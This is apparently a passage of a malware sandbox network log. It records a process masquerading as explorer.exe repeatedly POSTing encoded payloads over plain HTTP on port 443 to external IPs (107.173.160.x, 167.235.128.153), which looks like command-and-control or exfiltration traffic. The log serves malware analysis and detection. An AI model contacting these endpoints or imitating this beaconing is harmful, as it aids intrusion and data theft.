                                                          2024-07-19 11:44:58 UTC685INData Raw: 45 67 50 65 67 70 50 6a 67 57 36 6e 72 65 4f 41 55 63 76 56 7a 30 6b 48 6c 50 58 4e 31 79 7a 71 4f 6c 68 30 43 63 6b 36 43 79 5a 37 34 43 4f 2b 46 68 33 43 69 4b 44 52 65 61 46 31 38 2b 61 74 4a 58 69 62 42 43 53 2b 6a 6e 68 76 30 77 4d 74 69 56 48 4d 57 77 7a 6b 6a 48 35 64 56 48 6b 36 49 4b 6c 75 4b 7a 5a 65 38 30 56 32 57 6a 75 2f 6e 55 75 65 6d 51 70 43 58 4e 54 55 38 42 58 2b 52 75 4a 30 6c 68 42 51 46 5a 57 79 66 68 2f 53 66 6c 35 6e 56 73 6e 44 43 62 65 70 43 6c 69 61 4d 52 38 61 6b 39 70 63 44 77 6a 32 67 74 32 69 46 6a 4f 37 6c 6f 46 33 4a 44 78 58 7a 37 54 32 68 45 6c 32 6b 67 44 6b 38 33 70 69 4b 52 4e 78 68 2b 65 49 51 36 48 64 50 73 45 51 41 75 44 71 36 38 50 58 73 2b 45 6e 58 5a 54 43 63 6d 73 39 58 6c 76 67 37 67 68 2f 6a 77 6e 6b 35 35 37
                                                          Data Ascii: EgPegpPjgW6nreOAUcvVz0kHlPXN1yzqOlh0Cck6CyZ74CO+Fh3CiKDReaF18+atJXibBCS+jnhv0wMtiVHMWwzkjH5dVHk6IKluKzZe80V2Wju/nUuemQpCXNTU8BX+RuJ0lhBQFZWyfh/Sfl5nVsnDCbepCliaMR8ak9pcDwj2gt2iFjO7loF3JDxXz7T2hEl2kgDk83piKRNxh+eIQ6HdPsEQAuDq68PXs+EnXZTCcms9Xlvg7gh/jwnk557


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.557813107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:59 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:59 UTC1267OUTData Raw: 62 6a 64 61 57 33 2f 51 6e 78 32 2b 4d 74 78 73 47 6d 49 41 39 50 4f 77 2b 6b 56 6b 4c 47 32 6b 7a 57 52 4f 64 68 51 5a 36 6d 55 48 76 76 4a 39 43 64 47 33 79 66 31 34 78 4b 38 45 52 2b 58 73 44 34 34 61 31 54 6b 74 76 74 4c 6f 31 6c 36 4f 51 79 4c 36 78 31 30 31 72 2f 5a 55 72 46 35 52 41 44 4e 41 6e 34 7a 57 41 4b 62 46 64 4c 45 30 54 68 6b 30 6b 5a 61 44 52 6a 6e 76 69 55 6b 56 31 75 38 79 31 5a 63 63 2b 6b 4b 4c 36 6e 65 4d 54 39 54 56 7a 55 75 4a 54 35 48 69 6b 51 6e 6e 56 52 55 6f 5a 2f 51 46 50 78 6c 47 4b 71 78 45 6b 51 4c 51 52 4a 36 78 6b 34 74 31 55 43 58 2f 36 56 73 50 76 63 56 42 79 41 6d 33 30 42 57 72 6c 37 67 6e 71 30 35 45 2b 6a 6b 2b 77 57 39 54 38 79 4c 66 6b 56 57 50 79 72 58 52 50 47 4f 67 2b 35 41 4e 79 63 34 6c 6a 76 64 6f 4a 4b 37
                                                          Data Ascii: bjdaW3/Qnx2+MtxsGmIA9POw+kVkLG2kzWROdhQZ6mUHvvJ9CdG3yf14xK8ER+XsD44a1TktvtLo1l6OQyL6x101r/ZUrF5RADNAn4zWAKbFdLE0Thk0kZaDRjnviUkV1u8y1Zcc+kKL6neMT9TVzUuJT5HikQnnVRUoZ/QFPxlGKqxEkQLQRJ6xk4t1UCX/6VsPvcVByAm30BWrl7gnq05E+jk+wW9T8yLfkVWPyrXRPGOg+5ANyc4ljvdoJK7
                                                          2024-07-19 11:45:00 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:00 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:00 UTC685INData Raw: 35 41 44 66 36 30 38 78 44 6f 5a 6b 39 48 4e 2f 70 72 6b 69 43 47 79 7a 72 31 76 48 52 46 50 71 76 75 66 38 31 73 78 62 59 49 58 47 70 42 77 36 4e 63 34 2f 43 59 33 79 30 62 70 4b 56 71 4a 77 6a 7a 68 46 2f 53 2b 77 30 6d 7a 72 33 43 54 64 38 78 6e 65 4b 5a 57 59 44 4d 76 58 5a 6e 63 48 73 54 6f 6d 44 78 71 6f 58 52 63 6b 4c 50 4f 30 59 67 68 51 6a 4f 35 31 79 63 46 6f 50 48 6a 68 45 52 64 68 64 30 30 6d 57 37 58 51 6a 32 6d 51 64 59 49 43 6f 35 38 49 6a 58 38 39 65 50 32 54 7a 39 66 38 41 79 41 58 44 6b 70 4d 78 31 78 6f 77 56 65 78 53 5a 62 57 4a 61 7a 44 4c 73 38 66 4d 55 41 79 79 50 4a 36 56 7a 63 57 57 30 64 64 34 63 48 67 33 58 30 78 56 7a 4a 39 4a 58 4a 72 43 2b 42 33 4e 42 2b 74 6d 38 70 7a 6f 77 44 71 59 30 78 30 5a 44 64 37 2b 6d 6c 6f 33 69 66
                                                          Data Ascii: 5ADf608xDoZk9HN/prkiCGyzr1vHRFPqvuf81sxbYIXGpBw6Nc4/CY3y0bpKVqJwjzhF/S+w0mzr3CTd8xneKZWYDMvXZncHsTomDxqoXRckLPO0YghQjO51ycFoPHjhERdhd00mW7XQj2mQdYICo58IjX89eP2Tz9f8AyAXDkpMx1xowVexSZbWJazDLs8fMUAyyPJ6VzcWW0dd4cHg3X0xVzJ9JXJrC+B3NB+tm8pzowDqY0x0ZDd7+mlo3if


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.557814167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:01 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:01 UTC1122OUTData Raw: 71 44 44 37 49 6e 49 4e 7a 77 56 64 6c 69 76 50 38 5a 76 4b 48 44 6e 38 6f 41 42 42 47 4c 37 61 53 6a 6c 61 4b 78 6b 62 30 4c 63 31 32 35 30 54 49 2b 57 5a 34 46 65 48 6a 61 32 39 45 6a 66 2b 30 6e 46 6a 4c 68 62 66 78 56 51 6a 37 56 59 38 79 78 2f 37 72 56 68 59 78 35 69 33 6b 44 44 69 4a 56 49 73 57 56 41 67 4f 36 69 74 6e 4d 54 32 68 37 78 31 35 61 78 56 6e 67 4f 72 39 70 4d 63 4a 71 48 6e 56 62 46 6b 63 35 4c 57 57 55 58 34 6d 31 79 6e 6b 74 34 49 69 65 52 76 6a 46 48 66 4e 50 41 37 43 4d 46 2f 6b 2b 64 79 37 62 52 6c 52 4d 63 7a 38 50 4c 32 69 65 52 52 6c 38 50 48 46 55 43 70 59 33 6a 4f 2f 52 41 58 64 77 39 69 71 6f 52 56 58 72 37 6b 58 49 33 74 64 59 78 31 6e 4e 64 69 4c 62 78 62 2b 76 55 61 54 72 50 77 67 61 31 62 66 52 30 36 5a 70 6c 6b 51 53 41
                                                          Data Ascii: qDD7InINzwVdlivP8ZvKHDn8oABBGL7aSjlaKxkb0Lc1250TI+WZ4FeHja29Ejf+0nFjLhbfxVQj7VY8yx/7rVhYx5i3kDDiJVIsWVAgO6itnMT2h7x15axVngOr9pMcJqHnVbFkc5LWWUX4m1ynkt4IieRvjFHfNPA7CMF/k+dy7bRlRMcz8PL2ieRRl8PHFUCpY3jO/RAXdw9iqoRVXr7kXI3tdYx1nNdiLbxb+vUaTrPwga1bfR06ZplkQSA
                                                          2024-07-19 11:45:01 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:01 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:01 UTC685INData Raw: 73 51 41 4c 4a 46 2b 4d 70 6c 50 36 43 38 63 2f 52 54 42 6a 4d 44 63 35 53 70 47 47 45 53 76 31 5a 65 57 4f 6a 70 30 65 49 73 4a 34 38 37 6b 34 6a 70 70 70 59 61 32 79 69 6e 64 35 66 48 72 54 47 30 63 68 6a 52 36 39 56 59 67 58 64 4e 53 41 6c 76 54 61 42 49 4a 46 58 58 5a 2f 43 30 43 38 73 43 53 6c 65 4b 58 34 4b 34 6b 53 56 33 75 7a 4f 53 6e 6e 57 37 6d 4c 6f 4e 65 62 42 57 49 50 79 43 6d 62 78 34 55 71 4b 59 74 50 62 48 62 6d 33 55 77 2b 52 6e 42 6a 63 68 56 30 6d 65 41 4b 77 6a 61 30 34 54 75 73 6d 36 35 75 49 46 43 6f 75 39 64 61 62 6c 6d 4c 72 76 52 52 77 6b 58 6e 79 55 54 54 68 76 5a 49 31 6f 47 6f 50 4d 79 4d 50 4f 48 4e 56 50 7a 46 32 6e 64 5a 6b 44 53 62 43 58 78 67 69 70 61 4a 4b 44 4c 50 52 42 6d 79 31 7a 67 43 6b 37 61 32 35 4d 4b 35 44 48 66
                                                          Data Ascii: sQALJF+MplP6C8c/RTBjMDc5SpGGESv1ZeWOjp0eIsJ487k4jpppYa2yind5fHrTG0chjR69VYgXdNSAlvTaBIJFXXZ/C0C8sCSleKX4K4kSV3uzOSnnW7mLoNebBWIPyCmbx4UqKYtPbHbm3Uw+RnBjchV0meAKwja04Tusm65uIFCou9dablmLrvRRwkXnyUTThvZI1oGoPMyMPOHNVPzF2ndZkDSbCXxgipaJKDLPRBmy1zgCk7a25MK5DHf


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.557815107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:02 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:02 UTC1267OUTData Raw: 55 39 6c 68 44 54 2f 46 64 6a 67 56 37 30 76 52 4f 73 48 66 7a 65 32 44 2b 75 42 78 65 75 50 76 56 45 46 69 48 58 51 4a 53 77 4d 38 55 31 62 62 68 37 42 6a 49 66 6d 4a 6b 66 41 65 6b 58 50 6a 49 56 37 4d 47 38 47 76 63 6a 62 45 33 32 62 4b 42 57 52 54 76 78 59 42 4f 37 52 30 31 39 67 46 51 69 71 6d 62 4d 4e 4b 39 56 61 65 46 53 61 59 34 31 62 44 59 6b 32 73 6a 4b 7a 73 57 49 72 6f 69 43 52 75 6f 49 74 2b 75 58 61 6a 63 51 62 64 69 72 31 56 78 39 74 6a 54 76 6f 58 4a 69 38 66 54 67 2f 68 6e 44 35 49 58 32 77 63 6c 5a 4b 4b 6d 48 55 6d 66 6a 75 54 4a 6f 77 62 78 4b 37 4e 6c 31 77 33 68 5a 70 62 74 4b 78 63 50 34 67 59 39 45 66 66 53 2f 56 79 30 55 6c 52 63 6e 35 6e 68 77 78 38 2b 58 4b 2b 45 67 32 6f 72 55 69 38 6e 4d 4d 43 58 55 7a 66 45 39 55 79 43 6f 4e
                                                          Data Ascii: U9lhDT/FdjgV70vROsHfze2D+uBxeuPvVEFiHXQJSwM8U1bbh7BjIfmJkfAekXPjIV7MG8GvcjbE32bKBWRTvxYBO7R019gFQiqmbMNK9VaeFSaY41bDYk2sjKzsWIroiCRuoIt+uXajcQbdir1Vx9tjTvoXJi8fTg/hnD5IX2wclZKKmHUmfjuTJowbxK7Nl1w3hZpbtKxcP4gY9EffS/Vy0UlRcn5nhwx8+XK+Eg2orUi8nMMCXUzfE9UyCoN
                                                          2024-07-19 11:45:03 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:03 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:03 UTC685INData Raw: 72 7a 4a 39 36 57 37 75 76 51 49 33 33 57 68 64 77 79 52 44 33 47 42 2f 43 78 74 48 72 52 79 32 61 35 76 39 4b 56 30 4f 69 5a 2f 4f 56 56 79 67 51 55 71 45 4f 69 51 33 74 59 54 4f 79 4a 67 58 35 45 47 30 72 31 57 62 33 37 46 75 57 5a 45 79 41 75 4c 74 49 68 4d 30 41 31 78 41 6f 34 33 4a 30 68 4a 43 73 4a 6b 30 6c 48 61 48 45 64 49 6d 31 4d 51 33 43 76 4b 47 69 4e 44 53 4f 2b 79 63 48 6b 42 6c 41 38 39 4d 71 72 31 68 71 42 6b 72 70 52 4e 6a 36 74 75 50 74 79 5a 49 50 77 61 6a 56 4b 49 37 56 78 46 4a 71 57 53 69 56 4b 63 65 55 41 54 63 58 44 58 75 77 47 48 6a 74 50 61 55 76 70 50 4c 4a 43 42 2b 66 49 45 37 65 48 4b 76 69 59 4b 76 33 4e 42 4c 59 61 4a 69 46 7a 69 35 6c 72 76 46 53 53 68 41 6a 50 4f 64 7a 57 51 41 61 51 39 4d 54 55 75 76 77 57 61 4e 33 62 4b
                                                          Data Ascii: rzJ96W7uvQI33WhdwyRD3GB/CxtHrRy2a5v9KV0OiZ/OVVygQUqEOiQ3tYTOyJgX5EG0r1Wb37FuWZEyAuLtIhM0A1xAo43J0hJCsJk0lHaHEdIm1MQ3CvKGiNDSO+ycHkBlA89Mqr1hqBkrpRNj6tuPtyZIPwajVKI7VxFJqWSiVKceUATcXDXuwGHjtPaUvpPLJCB+fIE7eHKviYKv3NBLYaJiFzi5lrvFSShAjPOdzWQAaQ9MTUuvwWaN3bK


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.557816107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:04 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:04 UTC1267OUTData Raw: 43 6e 54 73 6c 66 49 34 35 46 30 65 64 53 37 42 37 79 44 45 52 49 58 6e 57 67 2f 2f 64 4c 62 47 38 76 58 2f 31 4e 67 4a 43 71 38 6d 54 4a 35 4c 52 75 37 46 59 73 42 50 59 66 70 32 4c 77 50 71 39 76 46 61 5a 57 7a 6c 6f 6b 67 63 36 46 52 6b 4a 6b 39 6e 6c 33 59 53 73 74 74 53 77 32 36 43 67 5a 41 4e 2b 41 34 59 48 39 6c 41 79 55 47 2b 36 68 47 45 37 41 75 38 53 59 62 35 46 53 51 42 6e 42 64 7a 4e 69 76 65 79 57 34 30 4d 57 38 45 30 76 79 54 48 73 6b 39 30 41 55 36 51 48 2b 67 47 6f 33 4d 58 71 30 31 49 35 70 4f 73 53 42 51 44 2b 41 61 4f 53 57 54 69 38 4b 75 6e 61 32 66 51 42 70 33 75 2f 66 56 69 52 6f 4f 77 78 4e 70 78 2b 69 71 49 6c 50 76 6b 36 4d 31 6e 35 62 46 4e 37 32 69 51 7a 37 53 68 66 4e 54 54 37 69 6c 53 74 4e 37 59 77 54 4b 37 33 54 45 50 2b 73
                                                          Data Ascii: CnTslfI45F0edS7B7yDERIXnWg//dLbG8vX/1NgJCq8mTJ5LRu7FYsBPYfp2LwPq9vFaZWzlokgc6FRkJk9nl3YSsttSw26CgZAN+A4YH9lAyUG+6hGE7Au8SYb5FSQBnBdzNiveyW40MW8E0vyTHsk90AU6QH+gGo3MXq01I5pOsSBQD+AaOSWTi8Kuna2fQBp3u/fViRoOwxNpx+iqIlPvk6M1n5bFN72iQz7ShfNTT7ilStN7YwTK73TEP+s
                                                          2024-07-19 11:45:05 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:05 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:05 UTC685INData Raw: 33 37 43 37 73 78 45 43 66 44 52 76 36 52 77 47 77 39 44 77 55 61 69 6c 78 49 62 78 48 48 55 52 50 35 45 44 62 76 42 49 4e 67 6c 6b 6a 6f 56 39 73 6e 62 2b 73 4a 48 4f 4f 77 45 35 2b 54 6f 6a 45 50 62 6e 44 6e 30 47 36 63 46 6b 71 30 77 41 6e 46 71 38 37 77 51 32 39 55 6e 2b 4c 42 41 57 39 35 69 51 44 71 4d 47 37 30 42 32 45 48 34 57 78 77 43 68 75 44 53 61 31 43 64 65 56 2f 4a 72 57 39 2b 52 57 36 35 65 59 52 52 2b 70 65 4a 38 59 70 62 41 78 34 48 54 62 78 35 52 53 74 72 66 61 33 64 61 47 42 4b 63 64 38 69 50 52 67 5a 66 44 35 58 68 52 76 70 50 48 61 4a 31 77 70 31 66 70 33 73 48 65 77 58 6e 56 4b 4a 33 4a 54 52 53 67 61 69 35 51 77 30 47 2b 78 2b 6a 4a 50 71 37 54 62 70 67 36 46 33 6c 4e 4e 6a 49 4a 39 6b 6d 43 6b 36 45 6d 51 4a 71 73 77 61 33 4a 53 65
                                                          Data Ascii: 37C7sxECfDRv6RwGw9DwUailxIbxHHURP5EDbvBINglkjoV9snb+sJHOOwE5+TojEPbnDn0G6cFkq0wAnFq87wQ29Un+LBAW95iQDqMG70B2EH4WxwChuDSa1CdeV/JrW9+RW65eYRR+peJ8YpbAx4HTbx5RStrfa3daGBKcd8iPRgZfD5XhRvpPHaJ1wp1fp3sHewXnVKJ3JTRSgai5Qw0G+x+jJPq7Tbpg6F3lNNjIJ9kmCk6EmQJqswa3JSe


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.557817167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:06 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:06 UTC1122OUTData Raw: 5a 45 6a 42 48 70 34 74 61 65 70 50 43 61 38 76 32 47 6c 6b 4c 76 44 70 62 76 52 30 72 35 55 6c 7a 2f 6f 43 41 4c 67 4f 30 6f 6f 78 6b 57 38 77 30 34 51 6e 72 47 72 42 52 71 47 6d 34 36 37 75 52 4d 54 63 34 52 66 70 31 7a 59 6e 4b 6f 39 77 4f 2f 67 77 4c 38 68 37 62 31 51 36 73 49 68 51 51 6c 65 6b 32 45 45 63 66 65 72 37 42 57 51 51 4d 46 51 79 2f 36 32 4c 54 74 72 6b 78 30 73 7a 49 64 52 32 58 72 39 62 6a 42 74 35 31 4e 39 35 79 30 7a 2b 4b 51 4f 75 69 68 53 59 67 52 6e 54 6b 44 31 45 64 43 5a 50 4b 62 57 73 70 65 5a 59 2b 34 6d 79 74 44 59 6a 35 49 4c 75 62 6e 44 61 69 37 33 61 4d 30 54 47 68 77 44 4c 72 71 72 42 32 66 77 76 74 30 53 6b 59 30 6e 30 77 52 42 65 31 37 63 52 4e 43 46 75 53 56 6f 46 41 6e 44 44 4b 70 36 49 33 57 63 47 59 4e 39 47 38 64 44
                                                          Data Ascii: ZEjBHp4taepPCa8v2GlkLvDpbvR0r5Ulz/oCALgO0ooxkW8w04QnrGrBRqGm467uRMTc4Rfp1zYnKo9wO/gwL8h7b1Q6sIhQQlek2EEcfer7BWQQMFQy/62LTtrkx0szIdR2Xr9bjBt51N95y0z+KQOuihSYgRnTkD1EdCZPKbWspeZY+4mytDYj5ILubnDai73aM0TGhwDLrqrB2fwvt0SkY0n0wRBe17cRNCFuSVoFAnDDKp6I3WcGYN9G8dD
                                                          2024-07-19 11:45:07 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:07 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:07 UTC685INData Raw: 6e 77 6f 30 79 45 35 55 30 4f 75 44 4d 62 46 61 2b 71 48 46 6d 7a 6d 6d 4c 39 4a 44 33 68 58 70 45 30 69 31 71 77 76 30 49 76 2f 77 46 6d 6c 38 78 65 62 75 68 74 57 79 57 65 30 73 64 32 6e 76 58 47 31 34 77 65 53 4b 74 52 56 56 32 6d 7a 53 4d 35 7a 6f 5a 30 72 55 69 4e 6c 47 2b 73 74 2f 63 7a 4f 65 4f 38 4c 37 32 6e 47 30 74 54 55 72 4f 66 75 4e 67 63 35 41 47 68 64 36 46 37 44 2f 32 70 57 44 48 6a 69 64 44 4f 57 43 4d 52 74 68 52 38 42 45 70 35 74 73 72 2b 41 64 4b 4b 6a 61 56 79 56 69 4c 6d 73 67 33 73 2f 6c 41 4d 46 6c 4c 71 6a 63 54 73 79 7a 59 63 4d 59 5a 79 48 38 73 55 42 75 31 32 6f 50 46 78 48 54 4f 56 43 55 67 59 57 2f 41 4f 58 65 39 52 49 72 2b 78 38 45 30 32 68 73 48 72 55 68 44 32 70 63 63 65 51 4a 7a 45 36 39 37 38 6d 51 66 51 51 68 35 79 39
                                                          Data Ascii: nwo0yE5U0OuDMbFa+qHFmzmmL9JD3hXpE0i1qwv0Iv/wFml8xebuhtWyWe0sd2nvXG14weSKtRVV2mzSM5zoZ0rUiNlG+st/czOeO8L72nG0tTUrOfuNgc5AGhd6F7D/2pWDHjidDOWCMRthR8BEp5tsr+AdKKjaVyViLmsg3s/lAMFlLqjcTsyzYcMYZyH8sUBu12oPFxHTOVCUgYW/AOXe9RIr+x8E02hsHrUhD2pcceQJzE6978mQfQQh5y9


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.557818107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:08 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:08 UTC1122OUTData Raw: 6b 46 47 62 73 4f 42 52 6b 37 33 58 70 2f 45 4f 6f 38 38 45 33 38 76 70 79 51 51 44 48 47 36 4c 69 4f 72 79 6a 77 6c 6c 30 31 75 69 63 75 6d 63 63 6c 65 55 58 5a 68 33 39 6e 39 4a 66 77 64 38 52 39 69 47 4a 52 65 6f 61 6c 44 46 58 32 31 42 4b 5a 30 78 4d 65 6d 6a 75 59 30 61 72 31 78 58 73 57 77 44 67 43 4f 4f 62 67 2b 66 76 66 4d 77 31 6c 2b 31 6b 6e 66 63 35 55 69 74 7a 77 58 47 51 41 71 73 61 45 77 34 6a 66 4f 39 76 54 32 39 43 52 57 76 51 55 74 6a 39 48 69 71 37 72 69 5a 45 6e 58 65 4a 32 73 77 4a 33 2b 46 42 77 44 67 68 56 37 30 77 63 33 4f 43 42 66 34 45 7a 33 66 77 2b 51 33 67 38 65 68 75 4a 58 37 45 64 46 43 75 44 79 67 2f 2f 41 68 2f 35 43 38 61 49 43 59 58 38 32 4f 55 6e 31 44 71 49 44 6a 72 43 74 77 4c 2b 57 53 70 64 35 74 33 59 52 79 7a 6a 37
                                                          Data Ascii: kFGbsOBRk73Xp/EOo88E38vpyQQDHG6LiOryjwll01uicumccleUXZh39n9Jfwd8R9iGJReoalDFX21BKZ0xMemjuY0ar1xXsWwDgCOObg+fvfMw1l+1knfc5UitzwXGQAqsaEw4jfO9vT29CRWvQUtj9Hiq7riZEnXeJ2swJ3+FBwDghV70wc3OCBf4Ez3fw+Q3g8ehuJX7EdFCuDyg//Ah/5C8aICYX82OUn1DqIDjrCtwL+WSpd5t3YRyzj7
                                                          2024-07-19 11:45:09 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:09 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:09 UTC685INData Raw: 4c 7a 30 4e 78 6e 6c 4f 69 42 48 67 4a 47 72 46 53 6d 4c 2b 43 6d 51 47 57 2f 54 50 74 6c 49 36 30 46 73 31 34 66 69 6d 67 34 39 59 31 4e 73 64 57 65 75 6e 6a 57 78 2b 55 73 73 30 59 51 69 58 65 4b 65 49 69 6f 72 75 2f 41 30 75 76 68 64 64 49 43 6e 48 4b 2b 77 69 58 47 7a 63 33 30 36 6f 6d 50 39 68 66 42 59 61 67 45 2b 54 30 36 4a 4b 53 51 2b 6c 63 6f 39 4a 2b 73 76 30 50 64 4a 31 73 6e 61 74 71 4a 31 6b 63 6e 37 53 43 71 33 4d 4a 6b 66 70 4b 5a 2b 46 49 76 32 43 34 34 4f 6e 58 53 2f 73 6b 63 38 41 43 62 77 51 6f 4b 55 39 68 56 67 4c 42 65 63 67 4c 6d 6f 6a 6c 43 6a 43 6b 74 54 30 6a 55 32 73 38 79 64 32 49 74 4e 43 48 65 4d 68 72 38 6b 5a 31 44 51 52 6a 4e 2b 44 38 65 62 32 4a 55 67 2f 69 72 44 6c 77 4e 7a 5a 79 35 50 4e 38 5a 69 64 44 30 66 50 34 74 53
                                                          Data Ascii: Lz0NxnlOiBHgJGrFSmL+CmQGW/TPtlI60Fs14fimg49Y1NsdWeunjWx+Uss0YQiXeKeIioru/A0uvhddICnHK+wiXGzc306omP9hfBYagE+T06JKSQ+lco9J+sv0PdJ1snatqJ1kcn7SCq3MJkfpKZ+FIv2C44OnXS/skc8ACbwQoKU9hVgLBecgLmojlCjCktT0jU2s8yd2ItNCHeMhr8kZ1DQRjN+D8eb2JUg/irDlwNzZy5PN8ZidD0fP4tS


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.557819107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:10 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:10 UTC1122OUTData Raw: 53 66 55 53 2f 6d 69 36 4c 59 57 58 36 6e 46 2b 4d 48 2b 6b 5a 62 64 64 5a 44 33 65 75 2f 34 75 6f 4f 71 35 70 6b 47 41 76 74 46 6e 49 48 39 6c 51 41 69 63 4c 6e 52 5a 54 4d 39 6f 59 79 39 74 43 4e 58 73 2f 74 39 6c 37 47 74 32 4b 69 78 73 6e 58 44 58 64 68 74 4d 6d 32 78 68 62 33 4e 6a 4b 51 72 6f 54 33 71 79 77 76 74 70 65 79 73 6d 78 44 73 79 48 64 32 53 4e 75 4f 75 69 78 61 35 76 39 57 39 79 52 62 78 32 37 38 6d 46 73 66 31 68 68 77 36 77 68 74 2b 6e 72 65 77 56 67 77 6f 45 30 6e 68 52 4b 42 66 78 62 4e 31 4f 38 41 5a 46 7a 4b 55 4f 6a 35 72 76 34 2b 50 6b 30 33 4d 33 7a 53 38 5a 48 2b 47 6e 77 79 35 34 4c 63 72 4d 63 38 5a 56 67 58 61 6a 7a 35 52 34 73 49 2b 64 6e 50 6b 78 55 66 43 6d 66 53 55 63 57 39 37 42 52 55 52 52 76 6f 6d 56 39 5a 6d 53 77 4b
                                                          Data Ascii: SfUS/mi6LYWX6nF+MH+kZbddZD3eu/4uoOq5pkGAvtFnIH9lQAicLnRZTM9oYy9tCNXs/t9l7Gt2KixsnXDXdhtMm2xhb3NjKQroT3qywvtpeysmxDsyHd2SNuOuixa5v9W9yRbx278mFsf1hhw6wht+nrewVgwoE0nhRKBfxbN1O8AZFzKUOj5rv4+Pk03M3zS8ZH+Gnwy54LcrMc8ZVgXajz5R4sI+dnPkxUfCmfSUcW97BRURRvomV9ZmSwK
                                                          2024-07-19 11:45:12 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:12 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
